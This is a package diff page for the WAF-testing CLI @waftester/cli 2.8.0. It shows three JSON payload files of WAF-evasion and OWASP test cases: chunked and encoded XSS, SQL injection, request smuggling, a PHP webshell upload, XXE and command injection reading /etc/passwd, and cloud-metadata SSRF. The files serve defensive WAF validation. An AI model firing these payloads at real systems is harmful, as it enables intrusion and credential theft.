npm - @waftester/cli - Versions diffs - 2.8.0 - Mend

@waftester/cli 2.8.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (141) hide show

package/LICENSE +80 -0
package/LICENSE-COMMUNITY +28 -0
package/README.md +121 -0
package/bin/cli.js +152 -0
package/package.json +52 -0
package/payloads/community/README.md +45 -0
package/payloads/community/ai/ml-poisoning.json +173 -0
package/payloads/community/ai/prompt-injection.json +247 -0
package/payloads/community/ai/workflow-abuse.json +222 -0
package/payloads/community/auth/jwt.json +855 -0
package/payloads/community/auth/login-bypass.json +623 -0
package/payloads/community/auth/mfa.json +402 -0
package/payloads/community/auth/oauth.json +421 -0
package/payloads/community/auth/open-redirect.json +1028 -0
package/payloads/community/auth/session.json +404 -0
package/payloads/community/cache/deception.json +402 -0
package/payloads/community/cache/poisoning.json +403 -0
package/payloads/community/deserialization/gadget.json +375 -0
package/payloads/community/deserialization/prototype.json +370 -0
package/payloads/community/fuzz/content-type.json +397 -0
package/payloads/community/fuzz/headers.json +401 -0
package/payloads/community/fuzz/methods.json +397 -0
package/payloads/community/fuzz/obfuscation.json +362 -0
package/payloads/community/fuzz/special-chars.json +740 -0
package/payloads/community/fuzz/waf-bypass.json +452 -0
package/payloads/community/graphql/batching-abuse.json +271 -0
package/payloads/community/graphql/depth-limit.json +271 -0
package/payloads/community/graphql/introspection.json +267 -0
package/payloads/community/injection/crlf.json +569 -0
package/payloads/community/injection/ldap.json +357 -0
package/payloads/community/injection/nosqli.json +529 -0
package/payloads/community/injection/oscmd.json +662 -0
package/payloads/community/injection/rce-polyglots.json +452 -0
package/payloads/community/injection/sqli.json +681 -0
package/payloads/community/injection/ssti.json +584 -0
package/payloads/community/injection/upload-attacks.json +632 -0
package/payloads/community/injection/xpath.json +357 -0
package/payloads/community/injection/xxe.json +716 -0
package/payloads/community/logic/forced-browsing.json +405 -0
package/payloads/community/logic/idor.json +1026 -0
package/payloads/community/logic/privilege.json +337 -0
package/payloads/community/media/exif-injection.json +225 -0
package/payloads/community/media/metadata-poison.json +239 -0
package/payloads/community/protocol/http-smuggling.json +798 -0
package/payloads/community/protocol/http2-attacks.json +382 -0
package/payloads/community/protocol/websocket-abuse.json +375 -0
package/payloads/community/rate-limit/burst-simulation.json +286 -0
package/payloads/community/rate-limit/bypass-attempts.json +326 -0
package/payloads/community/rate-limit/zone-tests.json +332 -0
package/payloads/community/services/authentik.json +415 -0
package/payloads/community/services/immich.json +423 -0
package/payloads/community/services/n8n.json +366 -0
package/payloads/community/sqli-basic.json +182 -0
package/payloads/community/ssrf/cloud-metadata.json +999 -0
package/payloads/community/ssrf/dns-rebinding.json +503 -0
package/payloads/community/ssrf/internal-networks.json +627 -0
package/payloads/community/ssrf/protocol-smuggling.json +350 -0
package/payloads/community/ssti/multi-language-templates.json +191 -0
package/payloads/community/ssti/python-templates.json +200 -0
package/payloads/community/traversal/basic.json +675 -0
package/payloads/community/traversal/cloud-credentials.json +107 -0
package/payloads/community/traversal/config-files.json +193 -0
package/payloads/community/traversal/encoding.json +558 -0
package/payloads/community/traversal/null-byte.json +105 -0
package/payloads/community/traversal/symlink.json +93 -0
package/payloads/community/traversal/unicode.json +134 -0
package/payloads/community/traversal/unix-advanced.json +195 -0
package/payloads/community/traversal/windows-advanced.json +195 -0
package/payloads/community/waf-bypass/cloudflare-bypass.json +102 -0
package/payloads/community/waf-bypass/encoding-bypass.json +120 -0
package/payloads/community/waf-bypass/evasion-techniques.json +164 -0
package/payloads/community/waf-bypass/hpp-bypass.json +92 -0
package/payloads/community/waf-bypass/modsecurity-crs.json +220 -0
package/payloads/community/waf-bypass/protocol-attacks.json +101 -0
package/payloads/community/waf-bypass/sqlmap-tamper.json +252 -0
package/payloads/community/waf-bypass/unicode-charset.json +152 -0
package/payloads/community/waf-bypass/vendor-bypasses.json +72 -0
package/payloads/community/waf-validation/README.md +172 -0
package/payloads/community/waf-validation/bypass-techniques.json +272 -0
package/payloads/community/waf-validation/custom-rules.json +952 -0
package/payloads/community/waf-validation/evasion-techniques.json +272 -0
package/payloads/community/waf-validation/modsecurity-core.json +151 -0
package/payloads/community/waf-validation/owasp-top10.json +236 -0
package/payloads/community/waf-validation/regression-tests.json +227 -0
package/payloads/community/xss/csp-bypass.json +431 -0
package/payloads/community/xss/dom.json +389 -0
package/payloads/community/xss/filter-bypass.json +1242 -0
package/payloads/community/xss/mutation.json +263 -0
package/payloads/community/xss/polyglots.json +371 -0
package/payloads/community/xss/reflected.json +187 -0
package/payloads/community/xss/stored.json +330 -0
package/payloads/crlf-injection.json +182 -0
package/payloads/ids-map.json +155 -0
package/payloads/ldap-injection.json +182 -0
package/payloads/nosql-injection.json +227 -0
package/payloads/prototype-pollution.json +182 -0
package/payloads/request-smuggling.json +182 -0
package/payloads/version.json +28 -0
package/payloads/xss-advanced.json +227 -0
package/templates/README.md +221 -0
package/templates/nuclei/http/waf-bypass/crlf-bypass.yaml +146 -0
package/templates/nuclei/http/waf-bypass/lfi-bypass.yaml +152 -0
package/templates/nuclei/http/waf-bypass/nosqli-bypass.yaml +166 -0
package/templates/nuclei/http/waf-bypass/rce-bypass.yaml +171 -0
package/templates/nuclei/http/waf-bypass/sqli-basic.yaml +142 -0
package/templates/nuclei/http/waf-bypass/sqli-evasion.yaml +192 -0
package/templates/nuclei/http/waf-bypass/ssrf-bypass.yaml +130 -0
package/templates/nuclei/http/waf-bypass/ssti-bypass.yaml +147 -0
package/templates/nuclei/http/waf-bypass/xss-basic.yaml +163 -0
package/templates/nuclei/http/waf-bypass/xss-evasion.yaml +217 -0
package/templates/nuclei/http/waf-bypass/xxe-bypass.yaml +204 -0
package/templates/nuclei/http/waf-detection/akamai-detect.yaml +105 -0
package/templates/nuclei/http/waf-detection/aws-waf-detect.yaml +115 -0
package/templates/nuclei/http/waf-detection/azure-waf-detect.yaml +114 -0
package/templates/nuclei/http/waf-detection/cloudflare-detect.yaml +121 -0
package/templates/nuclei/http/waf-detection/modsecurity-detect.yaml +129 -0
package/templates/nuclei/workflows/waf-assessment-workflow.yaml +71 -0
package/templates/output/asff.tmpl +61 -0
package/templates/output/csv.tmpl +4 -0
package/templates/output/junit.tmpl +34 -0
package/templates/output/markdown-report.tmpl +92 -0
package/templates/output/slack-notification.tmpl +95 -0
package/templates/output/text-summary.tmpl +56 -0
package/templates/overrides/api-only.yaml +130 -0
package/templates/overrides/crs-tuning.yaml +204 -0
package/templates/overrides/false-positive-suppression.yaml +159 -0
package/templates/policies/owasp-top10.yaml +152 -0
package/templates/policies/pci-dss.yaml +124 -0
package/templates/policies/permissive.yaml +40 -0
package/templates/policies/standard.yaml +57 -0
package/templates/policies/strict.yaml +72 -0
package/templates/report-configs/compliance.yaml +173 -0
package/templates/report-configs/dark.yaml +136 -0
package/templates/report-configs/enterprise.yaml +175 -0
package/templates/report-configs/minimal.yaml +84 -0
package/templates/report-configs/print.yaml +139 -0
package/templates/workflows/api-scan.yaml +132 -0
package/templates/workflows/ci-gate.yaml +129 -0
package/templates/workflows/full-scan.yaml +133 -0
package/templates/workflows/quick-probe.yaml +80 -0
package/templates/workflows/waf-detection.yaml +89 -0

package/payloads/community/waf-validation/evasion-techniques.json ADDED Viewed

@@ -0,0 +1,272 @@
+[
+  {
+    "id": "EVASION-CHUNKED-001",
+    "payload": "POST /api/data HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n5\r\n<scri\r\n7\r\npt>alert\r\n4\r\n(1)</\r\n7\r\nscript>\r\n0\r\n\r\n",
+    "tags": ["evasion", "chunked", "xss", "advanced"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Chunked transfer encoding to split XSS payload across chunks",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "WAFVAL-MULTILINE-001",
+    "payload": "GET /api/search?q=SE\r\nLECT%20*%20FROM%20users",
+    "tags": ["evasion", "multiline", "sqli", "advanced"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "CRLF injection to split SQL keyword across lines",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "WAFVAL-CONCAT-001",
+    "payload": "GET /api/search?q=SEL'+'ECT * FROM users",
+    "tags": ["evasion", "concatenation", "sqli", "advanced"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "String concatenation to bypass keyword detection",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "EVASION-CONCAT-002",
+    "payload": "GET /api/search?q=SEL||ECT%20*%20FROM%20users",
+    "tags": ["evasion", "concatenation", "sqli", "advanced"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Oracle-style concatenation bypass",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "EVASION-SCIENTIFIC-001",
+    "payload": "GET /api/users?id=1e0UNION%20SELECT%20*%20FROM%20users",
+    "tags": ["evasion", "scientific-notation", "sqli", "advanced"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Scientific notation to join SQL keywords without space",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "EVASION-BUFFER-001",
+    "payload": "GET /api/search?q=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' OR '1'='1",
+    "tags": ["evasion", "buffer-overflow", "sqli", "advanced"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Long string padding to overflow WAF buffer",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "EVASION-TIMING-001",
+    "payload": "POST /api/login HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\nusername=admin' AND SLEEP(5)--&password=test",
+    "tags": ["evasion", "content-length", "sqli", "advanced"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Content-Length mismatch to bypass body inspection",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "EVASION-JSON-001",
+    "payload": "POST /api/data HTTP/1.1\r\nContent-Type: application/json\r\n\r\n{\"query\":\"1' OR '1'='1\",\"bypass\":true}",
+    "tags": ["evasion", "json", "sqli", "advanced"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "SQL injection in JSON body",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "EVASION-JSON-002",
+    "payload": "POST /api/data HTTP/1.1\r\nContent-Type: application/json\r\n\r\n{\"query\":{\"$gt\":\"\"}}",
+    "tags": ["evasion", "json", "nosqli", "advanced"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "NoSQL injection via JSON operator",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "EVASION-MULTIPART-001",
+    "payload": "POST /api/upload HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=----X\r\n\r\n------X\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.php\"\r\nContent-Type: image/jpeg\r\n\r\n<?php system($_GET['c']); ?>\r\n------X--",
+    "tags": ["evasion", "multipart", "rce", "advanced"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "PHP webshell in multipart upload with fake content-type",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "EVASION-MULTIPART-002",
+    "payload": "POST /api/upload HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=----X\r\n\r\n------X\r\nContent-Disposition: form-data; name=\"data\"\r\n\r\n<script>alert(1)</script>\r\n------X--",
+    "tags": ["evasion", "multipart", "xss", "advanced"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "XSS in multipart form field",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "EVASION-CHARSET-001",
+    "payload": "GET /api/search?q=%u003Cscript%u003Ealert(1)%u003C/script%u003E",
+    "tags": ["evasion", "charset", "xss", "iis", "advanced"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "IIS %u encoding bypass",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "EVASION-CHARSET-002",
+    "payload": "GET /api/search?q=\\x3Cscript\\x3Ealert(1)\\x3C/script\\x3E",
+    "tags": ["evasion", "charset", "xss", "hex", "advanced"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Hex escape sequence XSS",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "EVASION-UTF7-001",
+    "payload": "GET /api/search?q=+ADw-script+AD4-alert(1)+ADw-/script+AD4-",
+    "tags": ["evasion", "utf7", "xss", "advanced"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "UTF-7 encoded XSS",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "EVASION-PUNYCODE-001",
+    "payload": "GET / HTTP/1.1\r\nHost: xn--e1afmkfd.xn--p1ai",
+    "tags": ["evasion", "punycode", "dns", "advanced"],
+    "expected_block": false,
+    "severity_hint": "Low",
+    "notes": "Punycode domain - may be legitimate IDN",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "EVASION-OVERLONG-001",
+    "payload": "GET /api/search?q=%c0%ae%c0%ae%c0%af/etc/passwd",
+    "tags": ["evasion", "overlong-utf8", "traversal", "advanced"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Overlong UTF-8 encoding for path traversal (../ = %c0%ae%c0%ae%c0%af)",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "EVASION-NORMALIZATION-001",
+    "payload": "GET /api/search?q=ｓｅｌｅｃｔ%20*%20ｆｒｏｍ%20users",
+    "tags": ["evasion", "fullwidth", "sqli", "unicode", "advanced"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Fullwidth Unicode characters for SQL keywords",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "EVASION-NORMALIZATION-002",
+    "payload": "GET /api/search?q=%EF%BC%9Cscript%EF%BC%9Ealert(1)%EF%BC%9C/script%EF%BC%9E",
+    "tags": ["evasion", "fullwidth", "xss", "unicode", "advanced"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Fullwidth angle brackets for XSS",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "EVASION-VERB-001",
+    "payload": "FOOBAR /api/admin HTTP/1.1\r\nX-HTTP-Method-Override: DELETE\r\nHost: target.com",
+    "tags": ["evasion", "method-override", "access-control", "advanced"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "HTTP method override header with invalid verb",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "EVASION-VERB-002",
+    "payload": "POST /api/data HTTP/1.1\r\nX-HTTP-Method: PUT\r\nX-Method-Override: DELETE\r\nContent-Type: application/json\r\n\r\n{}",
+    "tags": ["evasion", "method-override", "access-control", "advanced"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Multiple method override headers",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "EVASION-PATHCONF-001",
+    "payload": "GET /api;/admin HTTP/1.1",
+    "tags": ["evasion", "path-confusion", "access-control", "tomcat", "advanced"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Tomcat/Spring path parameter confusion",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "EVASION-PATHCONF-002",
+    "payload": "GET /api%2fadmin HTTP/1.1",
+    "tags": ["evasion", "path-confusion", "access-control", "advanced"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "URL-encoded path separator",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "EVASION-PATHCONF-003",
+    "payload": "GET /api\\admin HTTP/1.1",
+    "tags": ["evasion", "path-confusion", "access-control", "windows", "advanced"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Backslash path separator (Windows)",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "EVASION-CACHE-001",
+    "payload": "GET /api/search?q=test HTTP/1.1\r\nX-Original-URL: /admin\r\nHost: target.com",
+    "tags": ["evasion", "cache", "path-override", "advanced"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "X-Original-URL header to bypass path restrictions",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "EVASION-CACHE-002",
+    "payload": "GET /api/search?q=test HTTP/1.1\r\nX-Rewrite-URL: /admin\r\nHost: target.com",
+    "tags": ["evasion", "cache", "path-override", "advanced"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "X-Rewrite-URL header to bypass path restrictions",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "EVASION-FRAGMENT-001",
+    "payload": "GET /api/search?q=test#<script>alert(1)</script>",
+    "tags": ["evasion", "fragment", "xss", "advanced"],
+    "expected_block": true,
+    "severity_hint": "Medium",
+    "notes": "XSS in URL fragment (client-side only)",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "WAFVAL-PROTO-001",
+    "payload": "POST /api/data HTTP/1.0\r\nContent-Type: application/json\r\n\r\n{\"query\":\"' OR '1'='1\"}",
+    "tags": ["evasion", "http1.0", "sqli", "advanced"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "HTTP/1.0 protocol downgrade with injection",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "EVASION-PROTO-002",
+    "payload": "PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n",
+    "tags": ["evasion", "http2", "protocol", "advanced"],
+    "expected_block": false,
+    "severity_hint": "Low",
+    "notes": "HTTP/2 connection preface (informational)",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "EVASION-SMUGGLE-001",
+    "payload": "POST / HTTP/1.1\r\nHost: target.com\r\nContent-Length: 6\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nG",
+    "tags": ["evasion", "smuggling", "cl-te", "advanced", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "CL.TE HTTP request smuggling attempt",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "EVASION-SMUGGLE-002",
+    "payload": "POST / HTTP/1.1\r\nHost: target.com\r\nTransfer-Encoding: chunked\r\nContent-Length: 4\r\n\r\n5c\r\nGPOST / HTTP/1.1\r\nHost: target.com\r\nContent-Length: 10\r\n\r\ntest\r\n0\r\n\r\n",
+    "tags": ["evasion", "smuggling", "te-cl", "advanced", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "TE.CL HTTP request smuggling attempt",
+    "category": "WAF-Bypass"
+  }
+]

package/payloads/community/waf-validation/modsecurity-core.json ADDED Viewed

@@ -0,0 +1,151 @@
+[
+  {
+    "id": "WAF-CORE-001",
+    "payload": "GET /?id=1' OR '1'='1",
+    "tags": ["waf-validation", "sqli", "quick", "crs-942"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "CRS 942100-942999: SQL Injection detection",
+    "category": "WAF-Validation",
+    "crs_rule": "942100"
+  },
+  {
+    "id": "WAF-CORE-002",
+    "payload": "GET /?q=<script>alert(1)</script>",
+    "tags": ["waf-validation", "xss", "quick", "crs-941"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "CRS 941100-941999: XSS detection",
+    "category": "WAF-Validation",
+    "crs_rule": "941100"
+  },
+  {
+    "id": "WAF-CORE-003",
+    "payload": "GET /etc/passwd",
+    "tags": ["waf-validation", "lfi", "quick", "crs-930"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "CRS 930100-930999: Local File Inclusion",
+    "category": "WAF-Validation",
+    "crs_rule": "930100"
+  },
+  {
+    "id": "WAF-CORE-004",
+    "payload": "GET /?url=http://169.254.169.254/",
+    "tags": ["waf-validation", "ssrf", "quick", "crs-934"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "CRS 934100: SSRF to AWS metadata endpoint",
+    "category": "WAF-Validation",
+    "crs_rule": "934100"
+  },
+  {
+    "id": "WAF-CORE-005",
+    "payload": "GET /?cmd=;cat /etc/passwd",
+    "tags": ["waf-validation", "rce", "quick", "crs-932"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "CRS 932100-932999: Remote Code Execution",
+    "category": "WAF-Validation",
+    "crs_rule": "932100"
+  },
+  {
+    "id": "WAF-CORE-006",
+    "payload": "POST / HTTP/1.1\r\nContent-Type: application/xml\r\n\r\n<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>",
+    "tags": ["waf-validation", "xxe", "quick", "crs-931"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "CRS 931100-931999: XXE detection",
+    "category": "WAF-Validation",
+    "crs_rule": "931100"
+  },
+  {
+    "id": "WAF-CORE-007",
+    "payload": "GET /?file=....//....//etc/passwd",
+    "tags": ["waf-validation", "traversal", "quick", "crs-930"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "CRS 930110: Path Traversal with encoding",
+    "category": "WAF-Validation",
+    "crs_rule": "930110"
+  },
+  {
+    "id": "WAF-CORE-008",
+    "payload": "GET /?callback=<script>alert(document.domain)</script>",
+    "tags": ["waf-validation", "xss", "jsonp", "crs-941"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "CRS 941: JSONP callback XSS",
+    "category": "WAF-Validation",
+    "crs_rule": "941160"
+  },
+  {
+    "id": "WAF-CORE-009",
+    "payload": "GET /?search={{7*7}}",
+    "tags": ["waf-validation", "ssti", "quick", "crs-944"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "CRS 944: Server-Side Template Injection",
+    "category": "WAF-Validation",
+    "crs_rule": "944100"
+  },
+  {
+    "id": "WAF-CORE-010",
+    "payload": "GET /?data=O:8:\"stdClass\":0:{}",
+    "tags": ["waf-validation", "deserialization", "quick", "crs-944"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "CRS 944: PHP Object Injection",
+    "category": "WAF-Validation",
+    "crs_rule": "944120"
+  },
+  {
+    "id": "WAF-CORE-011",
+    "payload": "GET / HTTP/1.1\r\nHost: target\r\nUser-Agent: sqlmap/1.0",
+    "tags": ["waf-validation", "scanner", "quick", "crs-913"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "CRS 913100: Scanner detection (sqlmap)",
+    "category": "WAF-Validation",
+    "crs_rule": "913100"
+  },
+  {
+    "id": "WAF-CORE-012",
+    "payload": "GET / HTTP/1.1\r\nHost: target\r\nUser-Agent: Nikto",
+    "tags": ["waf-validation", "scanner", "quick", "crs-913"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "CRS 913100: Scanner detection (Nikto)",
+    "category": "WAF-Validation",
+    "crs_rule": "913100"
+  },
+  {
+    "id": "WAF-CORE-013",
+    "payload": "GET /.git/config",
+    "tags": ["waf-validation", "exposure", "quick", "crs-930"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "CRS 930120: Sensitive file access",
+    "category": "WAF-Validation",
+    "crs_rule": "930120"
+  },
+  {
+    "id": "WAF-CORE-014",
+    "payload": "GET /.env",
+    "tags": ["waf-validation", "exposure", "quick", "crs-930"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "CRS 930130: Environment file access",
+    "category": "WAF-Validation",
+    "crs_rule": "930130"
+  },
+  {
+    "id": "WAF-CORE-015",
+    "payload": "GET /wp-admin/",
+    "tags": ["waf-validation", "wordpress", "crs-930"],
+    "expected_block": false,
+    "severity_hint": "Low",
+    "notes": "WordPress paths - may or may not be blocked depending on config",
+    "category": "WAF-Validation"
+  }
+]

package/payloads/community/waf-validation/owasp-top10.json ADDED Viewed

@@ -0,0 +1,236 @@
+[
+  {
+    "id": "OWASP-A01-BAC-001",
+    "payload": "GET /admin/users HTTP/1.1\r\nCookie: role=admin",
+    "tags": ["owasp-top10", "A01", "broken-access-control", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "OWASP A01:2021 - Broken Access Control - Cookie manipulation",
+    "category": "OWASP-Top10"
+  },
+  {
+    "id": "OWASP-A01-BAC-002",
+    "payload": "GET /api/users/../../admin/config",
+    "tags": ["owasp-top10", "A01", "broken-access-control", "path-traversal", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "OWASP A01:2021 - Path traversal to admin",
+    "category": "OWASP-Top10"
+  },
+  {
+    "id": "OWASP-A01-BAC-003",
+    "payload": "GET /api/users/123 HTTP/1.1\r\nX-User-Id: 456",
+    "tags": ["owasp-top10", "A01", "idor"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "OWASP A01:2021 - IDOR via header manipulation",
+    "category": "OWASP-Top10"
+  },
+  {
+    "id": "OWASP-A02-CRYPTO-001",
+    "payload": "GET /api/data HTTP/1.1\r\nAccept-Encoding: identity\r\nCache-Control: no-store",
+    "tags": ["owasp-top10", "A02", "crypto-failures"],
+    "expected_block": false,
+    "severity_hint": "Low",
+    "notes": "OWASP A02:2021 - Testing cache headers (informational)",
+    "category": "OWASP-Top10"
+  },
+  {
+    "id": "OWASP-A03-INJ-001",
+    "payload": "GET /api/users?id=1' OR '1'='1",
+    "tags": ["owasp-top10", "A03", "injection", "sqli", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "OWASP A03:2021 - SQL Injection",
+    "category": "OWASP-Top10"
+  },
+  {
+    "id": "OWASP-A03-INJ-002",
+    "payload": "GET /api/search?q=<script>alert('XSS')</script>",
+    "tags": ["owasp-top10", "A03", "injection", "xss", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "OWASP A03:2021 - XSS Injection",
+    "category": "OWASP-Top10"
+  },
+  {
+    "id": "OWASP-A03-INJ-003",
+    "payload": "GET /api/exec?cmd=;cat /etc/passwd",
+    "tags": ["owasp-top10", "A03", "injection", "oscmd", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "OWASP A03:2021 - OS Command Injection",
+    "category": "OWASP-Top10"
+  },
+  {
+    "id": "OWASP-A03-INJ-004",
+    "payload": "GET /api/query?filter={\"$where\":\"this.password.match(/.*/)\"}}",
+    "tags": ["owasp-top10", "A03", "injection", "nosql", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "OWASP A03:2021 - NoSQL Injection",
+    "category": "OWASP-Top10"
+  },
+  {
+    "id": "OWASP-A03-INJ-005",
+    "payload": "GET /api/ldap?user=*)(uid=*))(|(uid=*",
+    "tags": ["owasp-top10", "A03", "injection", "ldap"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "OWASP A03:2021 - LDAP Injection",
+    "category": "OWASP-Top10"
+  },
+  {
+    "id": "OWASP-A04-DESIGN-001",
+    "payload": "POST /api/transfer HTTP/1.1\r\nContent-Type: application/json\r\n\r\n{\"amount\":-1000,\"to\":\"attacker\"}",
+    "tags": ["owasp-top10", "A04", "insecure-design"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "OWASP A04:2021 - Negative amount bypass",
+    "category": "OWASP-Top10"
+  },
+  {
+    "id": "OWASP-A05-MISCONFIG-001",
+    "payload": "GET /.git/config",
+    "tags": ["owasp-top10", "A05", "security-misconfiguration", "quick"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "OWASP A05:2021 - Git config exposure",
+    "category": "OWASP-Top10"
+  },
+  {
+    "id": "OWASP-A05-MISCONFIG-002",
+    "payload": "GET /.env",
+    "tags": ["owasp-top10", "A05", "security-misconfiguration", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "OWASP A05:2021 - Environment file exposure",
+    "category": "OWASP-Top10"
+  },
+  {
+    "id": "OWASP-A05-MISCONFIG-003",
+    "payload": "GET /server-status",
+    "tags": ["owasp-top10", "A05", "security-misconfiguration"],
+    "expected_block": true,
+    "severity_hint": "Medium",
+    "notes": "OWASP A05:2021 - Server status page",
+    "category": "OWASP-Top10"
+  },
+  {
+    "id": "OWASP-A05-MISCONFIG-004",
+    "payload": "GET /phpinfo.php",
+    "tags": ["owasp-top10", "A05", "security-misconfiguration"],
+    "expected_block": true,
+    "severity_hint": "Medium",
+    "notes": "OWASP A05:2021 - PHP info exposure",
+    "category": "OWASP-Top10"
+  },
+  {
+    "id": "OWASP-A06-VULN-001",
+    "payload": "GET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (compatible; Nessus SOAP)",
+    "tags": ["owasp-top10", "A06", "vulnerable-components"],
+    "expected_block": true,
+    "severity_hint": "Medium",
+    "notes": "OWASP A06:2021 - Vulnerability scanner detection",
+    "category": "OWASP-Top10"
+  },
+  {
+    "id": "OWASP-A06-VULN-002",
+    "payload": "GET /cgi-bin/test.cgi",
+    "tags": ["owasp-top10", "A06", "vulnerable-components"],
+    "expected_block": true,
+    "severity_hint": "Medium",
+    "notes": "OWASP A06:2021 - Legacy CGI access",
+    "category": "OWASP-Top10"
+  },
+  {
+    "id": "OWASP-A07-AUTH-001",
+    "payload": "POST /api/login HTTP/1.1\r\nContent-Type: application/json\r\n\r\n{\"username\":\"admin\",\"password\":\"admin\"}",
+    "tags": ["owasp-top10", "A07", "auth-failures"],
+    "expected_block": false,
+    "severity_hint": "Low",
+    "notes": "OWASP A07:2021 - Default credentials (app should reject)",
+    "category": "OWASP-Top10"
+  },
+  {
+    "id": "OWASP-A08-INTEGRITY-001",
+    "payload": "POST /api/update HTTP/1.1\r\nContent-Type: application/json\r\n\r\n{\"__proto__\":{\"isAdmin\":true}}",
+    "tags": ["owasp-top10", "A08", "software-data-integrity", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "OWASP A08:2021 - Prototype pollution",
+    "category": "OWASP-Top10"
+  },
+  {
+    "id": "OWASP-A08-INTEGRITY-002",
